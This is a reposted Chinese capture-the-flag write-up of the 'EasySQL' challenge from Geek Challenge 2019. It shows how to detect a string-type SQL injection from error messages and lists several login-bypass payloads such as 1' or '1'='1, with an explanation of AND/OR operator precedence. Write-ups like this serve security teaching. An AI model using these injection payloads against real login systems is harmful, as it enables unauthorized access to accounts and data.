0


【极客大挑战 2019】EasySQL

[极客大挑战 2019] EasySQL

判断是数字还是字符型注入

image-20220501231955285

正常查询的回显

image-20220501232042283

输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测

image-20220501233358022

image-20220501232207377

使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句

# 万能公式1and1=11' and '1'='11or1=11' or '1'='1

image-20220501233605186

image-20220501233123354

为什么用 1’ and ‘1’='1不行呢?

image-20220501233653085

image-20220501233736334

测试的时候输入了 1’ and ‘1’=1这个有问题的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。

# payloadSELECT*FROMtablesWHERE username='1'or'1'='1'and password='1'or'1'='1'# 优先级排序:and 优先级高于 or,所以要计算 and 然后再计算 or
username='1'--->false'1'='1'---> true
passwrod='1'--->false'1'='1'--->truefalseor(trueandfalse)ortruefalseorfalseortruefalseortrue#得出结果:true

image-20220501233806321

照这种方法就可以推算出不同的解法

# payload1# 用户名:1' and '1'='1# 密码:1' or '1'='1# payload2# 用户名:1' and '1'='2# 密码:1' or '1'='1# 本质上都是利用 and 和 or 的优先级进行判断,只要返回 TRUE 就没问题
标签: web安全

本文转载自: https://blog.csdn.net/qq_45925514/article/details/124748420
版权归原作者 iKnsec 所有, 如有侵权,请联系我们删除。

“【极客大挑战 2019】EasySQL”的评论:

还没有评论